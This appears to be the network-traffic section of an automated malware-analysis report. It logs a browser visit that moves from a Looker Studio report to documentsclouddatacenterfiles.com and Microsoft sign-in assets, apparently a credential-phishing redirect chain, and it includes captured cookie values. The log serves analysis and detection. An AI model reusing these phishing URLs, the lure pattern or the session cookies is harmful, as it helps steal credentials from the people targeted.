          Source: global trafficHTTP traffic detected: GET /js/googleapis.proxy.js?onload=startup HTTP/1.1Host: apis.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=GBrk4Cwm7WXeWu6aphAIdIp_MQi9gUsEoSh7FyZLTZv0KhRmQLBSeaVov2C5rAqZUuZQ8ErWTRYa7DJ4-rnS4wvptxW2ExP3dB9lfzozkRFCHuC1HncEL15cRxeif-VZxRIALtN371CoqmjVgBgFuFtCcQMFb3i8FyvN-kpeJrpCZ3pwtpoo9d7tjyaV
          Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.lb.en.5oZHy0SiJxw.O/m=googleapis_proxy/rt=j/sv=1/d=1/ed=1/rs=AHpOoo-Hry6DG-RE4t9kNz_t6hiwmwXOmA/cb=gapi.loaded_0?le=scs HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://content-people-pa.googleapis.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=GBrk4Cwm7WXeWu6aphAIdIp_MQi9gUsEoSh7FyZLTZv0KhRmQLBSeaVov2C5rAqZUuZQ8ErWTRYa7DJ4-rnS4wvptxW2ExP3dB9lfzozkRFCHuC1HncEL15cRxeif-VZxRIALtN371CoqmjVgBgFuFtCcQMFb3i8FyvN-kpeJrpCZ3pwtpoo9d7tjyaV
          Source: global trafficHTTP traffic detected: GET /js/googleapis.proxy.js?onload=startup HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://content-sheets.googleapis.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=GBrk4Cwm7WXeWu6aphAIdIp_MQi9gUsEoSh7FyZLTZv0KhRmQLBSeaVov2C5rAqZUuZQ8ErWTRYa7DJ4-rnS4wvptxW2ExP3dB9lfzozkRFCHuC1HncEL15cRxeif-VZxRIALtN371CoqmjVgBgFuFtCcQMFb3i8FyvN-kpeJrpCZ3pwtpoo9d7tjyaV
          Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.lb.en.5oZHy0SiJxw.O/m=googleapis_proxy/rt=j/sv=1/d=1/ed=1/rs=AHpOoo-Hry6DG-RE4t9kNz_t6hiwmwXOmA/cb=gapi.loaded_0?le=scs HTTP/1.1Host: apis.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=GBrk4Cwm7WXeWu6aphAIdIp_MQi9gUsEoSh7FyZLTZv0KhRmQLBSeaVov2C5rAqZUuZQ8ErWTRYa7DJ4-rnS4wvptxW2ExP3dB9lfzozkRFCHuC1HncEL15cRxeif-VZxRIALtN371CoqmjVgBgFuFtCcQMFb3i8FyvN-kpeJrpCZ3pwtpoo9d7tjyaV
          Source: global trafficHTTP traffic detected: GET /getImageV2?reportId=81df319f-c619-47b3-a6ca-c725ddb997af&id=ADpgoFVYV%2FnGjGKkaPduuVlic9dveoFsHciDQS2sgWmVRW9TG7npuYoJyyxcQE8YbagId8hkPN2b5pa2teWlLsUQlIsfEbmkvGearM8enCY1p8uWrdZPLddsmp6tCf0HcdOJ4PQM2Bv0PJgjYD6fK8OgcTJTDz60mlaVoidMtTQ%3D HTTP/1.1Host: lookerstudio.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=GBrk4Cwm7WXeWu6aphAIdIp_MQi9gUsEoSh7FyZLTZv0KhRmQLBSeaVov2C5rAqZUuZQ8ErWTRYa7DJ4-rnS4wvptxW2ExP3dB9lfzozkRFCHuC1HncEL15cRxeif-VZxRIALtN371CoqmjVgBgFuFtCcQMFb3i8FyvN-kpeJrpCZ3pwtpoo9d7tjyaV; _gid=GA1.3.993301056.1740506532; _gat=1; _ga=GA1.3.1335553841.1740506532; _gat_marketingTracker=1; _ga_S4FJY0X3VX=GS1.1.1740506533.1.1.1740506547.0.0.0
          Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.lb.en.5oZHy0SiJxw.O/m=googleapis_proxy/rt=j/sv=1/d=1/ed=1/rs=AHpOoo-Hry6DG-RE4t9kNz_t6hiwmwXOmA/cb=gapi.loaded_0?le=scs HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://content-sheets.googleapis.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=GBrk4Cwm7WXeWu6aphAIdIp_MQi9gUsEoSh7FyZLTZv0KhRmQLBSeaVov2C5rAqZUuZQ8ErWTRYa7DJ4-rnS4wvptxW2ExP3dB9lfzozkRFCHuC1HncEL15cRxeif-VZxRIALtN371CoqmjVgBgFuFtCcQMFb3i8FyvN-kpeJrpCZ3pwtpoo9d7tjyaV
          Source: global trafficHTTP traffic detected: GET /getFirebaseAuthToken?appVersion=20250210_0007 HTTP/1.1Host: lookerstudio.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=GBrk4Cwm7WXeWu6aphAIdIp_MQi9gUsEoSh7FyZLTZv0KhRmQLBSeaVov2C5rAqZUuZQ8ErWTRYa7DJ4-rnS4wvptxW2ExP3dB9lfzozkRFCHuC1HncEL15cRxeif-VZxRIALtN371CoqmjVgBgFuFtCcQMFb3i8FyvN-kpeJrpCZ3pwtpoo9d7tjyaV; _gid=GA1.3.993301056.1740506532; _gat=1; _ga=GA1.3.1335553841.1740506532; _gat_marketingTracker=1; _ga_S4FJY0X3VX=GS1.1.1740506533.1.1.1740506547.0.0.0
          Source: global trafficHTTP traffic detected: GET /SNSLED HTTP/1.1Host: view.documentsclouddatacenterfiles.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: lookerstudio.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://lookerstudio.google.com/reporting/81df319f-c619-47b3-a6ca-c725ddb997af/page/p_4gb3na7ypd?s=r0LPf6tGFnwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.3.993301056.1740506532; _gat=1; _ga=GA1.3.1335553841.1740506532; _gat_marketingTracker=1; _ga_S4FJY0X3VX=GS1.1.1740506533.1.1.1740506547.0.0.0; NID=522=jtOJg9UDzs10rl5zHWwstENXg0F_NjqUsJMZVmAima38-z9eslpbIuDAkTq8IyNW7kHtYgCEGO31GkQBZQPLbDHOmYNx3cA-Pu2FIMJI9I25DdeC-KHvB5QkenjfAwMP1dHUl1R8IMbKGDz5mVr5axExlgSQEBvH4sBzk_iBbJPed3DImrAz5OL1ApyhUbruTFyD
          Source: global trafficHTTP traffic detected: GET /EyIqNHAA HTTP/1.1Host: documentsclouddatacenterfiles.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://view.documentsclouddatacenterfiles.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: errorurl=https://view.documentsclouddatacenterfiles.com/SNSLED
          Source: global trafficHTTP traffic detected: GET /EyIqNHAA HTTP/1.1Host: documentsclouddatacenterfiles.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://documentsclouddatacenterfiles.com/EyIqNHAAAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: errorurl=https://view.documentsclouddatacenterfiles.com/SNSLED; season=active
          Source: global trafficHTTP traffic detected: GET /updatePresence?appVersion=20250210_0007 HTTP/1.1Host: lookerstudio.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.3.993301056.1740506532; _gat=1; _ga=GA1.3.1335553841.1740506532; _gat_marketingTracker=1; _ga_S4FJY0X3VX=GS1.1.1740506533.1.1.1740506547.0.0.0; NID=522=jtOJg9UDzs10rl5zHWwstENXg0F_NjqUsJMZVmAima38-z9eslpbIuDAkTq8IyNW7kHtYgCEGO31GkQBZQPLbDHOmYNx3cA-Pu2FIMJI9I25DdeC-KHvB5QkenjfAwMP1dHUl1R8IMbKGDz5mVr5axExlgSQEBvH4sBzk_iBbJPed3DImrAz5OL1ApyhUbruTFyD
          Source: global trafficHTTP traffic detected: GET /EyIqNHAA HTTP/1.1Host: documentsclouddatacenterfiles.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://documentsclouddatacenterfiles.com/EyIqNHAAAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: errorurl=https://view.documentsclouddatacenterfiles.com/SNSLED; season=active
          Source: global trafficHTTP traffic detected: GET /SNSLED HTTP/1.1Host: view.documentsclouddatacenterfiles.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: errorurl=https://view.documentsclouddatacenterfiles.com/SNSLED
          Source: global trafficHTTP traffic detected: GET /EyIqNHAA HTTP/1.1Host: documentsclouddatacenterfiles.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://view.documentsclouddatacenterfiles.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: errorurl=https://view.documentsclouddatacenterfiles.com/SNSLED; season=active
          Source: global trafficHTTP traffic detected: GET /EyIqNHAA?office365cloud=true HTTP/1.1Host: documentsclouddatacenterfiles.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: errorurl=https://view.documentsclouddatacenterfiles.com/SNSLED; season=active
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: documentsclouddatacenterfiles.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: errorurl=https://view.documentsclouddatacenterfiles.com/SNSLED; season=active
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: documentsclouddatacenterfiles.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: errorurl=https://view.documentsclouddatacenterfiles.com/SNSLED; season=active; verified=true
          Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficDNS traffic detected: DNS query: lookerstudio.google.com
          Source: global trafficDNS traffic detected: DNS query: apis.google.com
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: play.google.com
          Source: global trafficDNS traffic detected: DNS query: view.documentsclouddatacenterfiles.com
          Source: global trafficDNS traffic detected: DNS query: documentsclouddatacenterfiles.com
          Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
          Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
          Source: global trafficDNS traffic detected: DNS query: code.jquery.com
          Source: global trafficDNS traffic detected: DNS query: datacenter.documentsclouddatacenterfiles.com
          Source: unknownHTTP traffic detected: POST /getReport?appVersion=20250210_0007 HTTP/1.1Host: lookerstudio.google.comConnection: keep-aliveContent-Length: 194sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*Content-Type: application/jsonsec-ch-ua-mobile: ?0encoding: nullUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://lookerstudio.google.comX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://lookerstudio.google.com/reporting/81df319f-c619-47b3-a6ca-c725ddb997af?s=r0LPf6tGFnwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=GBrk4Cwm7WXeWu6aphAIdIp_MQi9gUsEoSh7FyZLTZv0KhRmQLBSeaVov2C5rAqZUuZQ8ErWTRYa7DJ4-rnS4wvptxW2ExP3dB9lfzozkRFCHuC1HncEL15cRxeif-VZxRIALtN371CoqmjVgBgFuFtCcQMFb3i8FyvN-kpeJrpCZ3pwtpoo9d7tjyaV; _gid=GA1.3.993301056.1740506532; _gat=1; _ga_S4FJY0X3VX=GS1.1.1740506533.1.1.1740506545.0.0.0; _ga=GA1.3.1335553841.1740506532; _gat_marketingTracker=1
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50190
          Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
          Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
          Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
          Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
          Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
          Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
          Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
          Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
          Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50136
          Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
          Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
          Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50190 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
          Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
          Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
          Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
